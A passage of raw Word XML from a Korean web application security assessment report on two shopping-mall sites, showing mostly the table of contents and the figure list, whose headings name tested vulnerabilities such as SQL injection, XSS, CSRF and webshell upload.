                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15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데이터 평문 전송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1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82" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15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2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83" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15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3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84" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15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4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4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10"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48909085" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4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noProof/>
              </w:rPr>
              <w:t>상세 진단 결과(아바타몰)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4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86" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4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SQL 인젝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6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4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87" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1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4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88" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1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8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4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89" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1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89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6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90" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4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정보누출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0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91" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2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1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92" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2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2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7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93" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2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3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8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94" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4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크로스 사이트 스크립팅(Cross-site scripting)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4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9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95" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3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9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96" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3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6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49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97" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3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7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50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098" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4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약한 문자열 강도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8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5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099" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4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099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5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100" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4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100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51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101" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4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101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5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2"/>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc48909102" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5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프로세스 검증 누락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102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5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103" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.1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취약점 정의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103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5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104" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.2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상세분석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104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53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0411AE" w:rsidRDefault="0065142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9105" w:history="1">
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.5.3</w:t>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000411AE" w:rsidRPr="00EC64CF">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>보안대책</w:t>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc48909105 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>55</w:t>
            </w:r>
            <w:r w:rsidR="000411AE">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="009E03F0" w:rsidRPr="004B4285" w:rsidRDefault="001A1B46" w:rsidP="004B4285">
          <w:pPr>
            <w:rPr>
              <w:b/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00C97C1E">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="ko-KR"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="000411AE" w:rsidRDefault="00DB0143" w:rsidP="00800EF3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E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표 목차</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "&lt;표1-" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r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06" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표1- 1&gt; 진단일정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06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8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07" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표1- 2&gt; 수행인원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07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8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08" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표1- 3&gt; WEB 진단대상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08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8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09" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표1- 4&gt; 웹 어플리케이션 소스 보안 진단 체크리스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09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10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10" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표2- 5&gt; 코어몰 취약점 진단 결과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10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12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11" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="00884B6C">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>&lt;표2- 6&gt; 아바타몰 취약점 진단 결과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11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13</w:t>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00DB0143" w:rsidRPr="00C97C1E" w:rsidRDefault="00DB0143" w:rsidP="00DB0143">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472FEB" w:rsidRPr="00C97C1E" w:rsidRDefault="00472FEB" w:rsidP="00800EF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C97C1E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그림 목차</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000411AE" w:rsidRDefault="00C571DC">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:ind w:left="1200" w:hanging="400"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "[그림 3-" </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc48909153" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 1] SQL 인젝션 공격 시도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53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14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54" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 2] SQL 오류 메시지 반환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54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15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55" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 3] Sqlmap으로 DB의 중요 정보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55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15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56" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 4] 마스킹 처리 되지 않은 민감한 정보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56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17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57" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 5] exe 파일 업로드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57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19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58" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 6] exe 파일 다운로드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58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19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59" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 7] XSS 공격 시도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59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1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0" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 8] XSS 공격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0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1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1" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 9] 아이디 찾기 시도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1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3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2" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 10] 패스워드 찾기 시도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2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4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3" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 11] 아이디 및 패스워드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3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4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4" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 12] CSRF 공격 스크립트 작성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4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6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5" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 13] CSRF 공격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5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6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6" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 14] 파라미터 변조 후 접근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6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8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7" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 15] 웹 서버의 경로 값을 응답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7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8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8" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 16] 로그인 후 시간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8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29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69" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 17] 세션 유지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69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0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0" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 18] 세션ID를 발급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0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1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1" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 19] 로그아웃 후 세션ID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1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2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2" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 20] 재로그인 후 세션ID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2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2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3" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 21] 자동화 공격 시도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3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4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4" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 22] 자동화 공격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4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4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5" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 23] 인증 로직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5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6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6" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 24] 인증 우회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6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6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7" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 25] 데이터 변조를 이용한 파일 업로드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7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8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8" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 26] 파일 업로드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8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8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79" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 27] webshell 실행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79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39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0" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 28] 관리자 로그인 페이지 접근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0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40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1" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 29] 데이터 변조를 이용한 파일 업로드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1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42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2" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 30] 데이터 평문 전송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2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43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3" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 31] SQL 인젝션 공격 시도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3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45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4" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 32] SQL 오류 메시지 반환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4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45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5" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 33] 필수 입력 값을 비움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5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47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6" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 34] 정보 누출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6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48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7" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 35] XSS 공격 스크립트 작성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7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49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8" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 36] XSS 공격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8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50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89" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 37] 패스워드 문자열 제한1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89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52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90" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 3 - 38] 패스워드 문자열 제한2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90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52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91" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 39] 공지사항 게시판 확인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91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54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92" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 40] 요청 변조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92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54</w:t>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000411AE" w:rsidRDefault="0065142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9193" w:history="1">
        <w:r w:rsidR="000411AE" w:rsidRPr="007A4F48">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:noProof/>
          </w:rPr>
          <w:t>[그림 4 - 41] 게시판 수정 화면</w:t>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc48909193 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r w:rsidR="000411AE">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00135123" w:rsidRPr="00C97C1E" w:rsidRDefault="00C571DC" w:rsidP="00853E4F">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:ind w:left="1200" w:hanging="400"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F108A0" w:rsidRPr="00C97C1E" w:rsidRDefault="00F108A0" w:rsidP="00F108A0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00800EF3" w:rsidRPr="00C97C1E" w:rsidRDefault="00800EF3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471926" w:rsidRPr="00C97C1E" w:rsidRDefault="001D1BFD" w:rsidP="001D1BFD">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc48909002"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:lastRenderedPageBreak/>
        <w:t>1 개요</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="001D1BFD" w:rsidRPr="00C97C1E" w:rsidRDefault="001D1BFD" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:leftChars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" w:name="_Toc408956307"/>
      <w:bookmarkStart w:id="2" w:name="_Toc408956455"/>
      <w:bookmarkStart w:id="3" w:name="_Toc408956613"/>
      <w:bookmarkStart w:id="4" w:name="_Toc408956689"/>
      <w:bookmarkStart w:id="5" w:name="_Toc408956757"/>
      <w:bookmarkStart w:id="6" w:name="_Toc408956791"/>
      <w:bookmarkStart w:id="7" w:name="_Toc408956816"/>
      <w:bookmarkStart w:id="8" w:name="_Toc408956835"/>
      <w:bookmarkStart w:id="9" w:name="_Toc408956891"/>
      <w:bookmarkStart w:id="10" w:name="_Toc408956904"/>
      <w:bookmarkStart w:id="11" w:name="_Toc408956911"/>
      <w:bookmarkStart w:id="12" w:name="_Toc408956951"/>
      <w:bookmarkStart w:id="13" w:name="_Toc408957068"/>
      <w:bookmarkStart w:id="14" w:name="_Toc408957096"/>
      <w:bookmarkStart w:id="15" w:name="_Toc408957181"/>
      <w:bookmarkStart w:id="16" w:name="_Toc408957275"/>
      <w:bookmarkStart w:id="17" w:name="_Toc408957361"/>
      <w:bookmarkStart w:id="18" w:name="_Toc408957415"/>
      <w:bookmarkStart w:id="19" w:name="_Toc408957512"/>
      <w:bookmarkStart w:id="20" w:name="_Toc408957566"/>
      <w:bookmarkStart w:id="21" w:name="_Toc408957603"/>
      <w:bookmarkStart w:id="22" w:name="_Toc408957788"/>
      <w:bookmarkStart w:id="23" w:name="_Toc408957806"/>
      <w:bookmarkStart w:id="24" w:name="_Toc408957845"/>
      <w:bookmarkStart w:id="25" w:name="_Toc408958170"/>
      <w:bookmarkStart w:id="26" w:name="_Toc408958387"/>
      <w:bookmarkStart w:id="27" w:name="_Toc408958465"/>
      <w:bookmarkStart w:id="28" w:name="_Toc408960833"/>
      <w:bookmarkStart w:id="29" w:name="_Toc408996350"/>
      <w:bookmarkStart w:id="30" w:name="_Toc408999655"/>
      <w:bookmarkStart w:id="31" w:name="_Toc408999704"/>
      <w:bookmarkStart w:id="32" w:name="_Toc409005917"/>
      <w:bookmarkStart w:id="33" w:name="_Toc409006727"/>
      <w:bookmarkStart w:id="34" w:name="_Toc409006978"/>
      <w:bookmarkStart w:id="35" w:name="_Toc409009206"/>
      <w:bookmarkStart w:id="36" w:name="_Toc409009261"/>
      <w:bookmarkStart w:id="37" w:name="_Toc409009318"/>
      <w:bookmarkStart w:id="38" w:name="_Toc409009374"/>
      <w:bookmarkStart w:id="39" w:name="_Toc409009648"/>
      <w:bookmarkStart w:id="40" w:name="_Toc409012633"/>
      <w:bookmarkStart w:id="41" w:name="_Toc428014731"/>
      <w:bookmarkStart w:id="42" w:name="_Toc428825942"/>
      <w:bookmarkStart w:id="43" w:name="_Toc428826018"/>
      <w:bookmarkStart w:id="44" w:name="_Toc428831982"/>
      <w:bookmarkStart w:id="45" w:name="_Toc428832096"/>
      <w:bookmarkStart w:id="46" w:name="_Toc429863572"/>
      <w:bookmarkStart w:id="47" w:name="_Toc461106446"/>
      <w:bookmarkStart w:id="48" w:name="_Toc48720655"/>
      <w:bookmarkStart w:id="49" w:name="_Toc48721350"/>
      <w:bookmarkStart w:id="50" w:name="_Toc48895416"/>
      <w:bookmarkStart w:id="51" w:name="_Toc48903705"/>
      <w:bookmarkStart w:id="52" w:name="_Toc48908644"/>
      <w:bookmarkStart w:id="53" w:name="_Toc48908748"/>
      <w:bookmarkStart w:id="54" w:name="_Toc48908852"/>
      <w:bookmarkStart w:id="55" w:name="_Toc489090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1D1BFD" w:rsidRPr="00C97C1E" w:rsidRDefault="001D1BFD" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc48909004"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>목적</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w:rsidR="001A1B46" w:rsidRPr="00A24C89" w:rsidRDefault="00281518" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">운영 중인 </w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>코어몰(</w:t>
      </w:r>
      <w:r w:rsidR="00B2121D" w:rsidRPr="00A24C89">
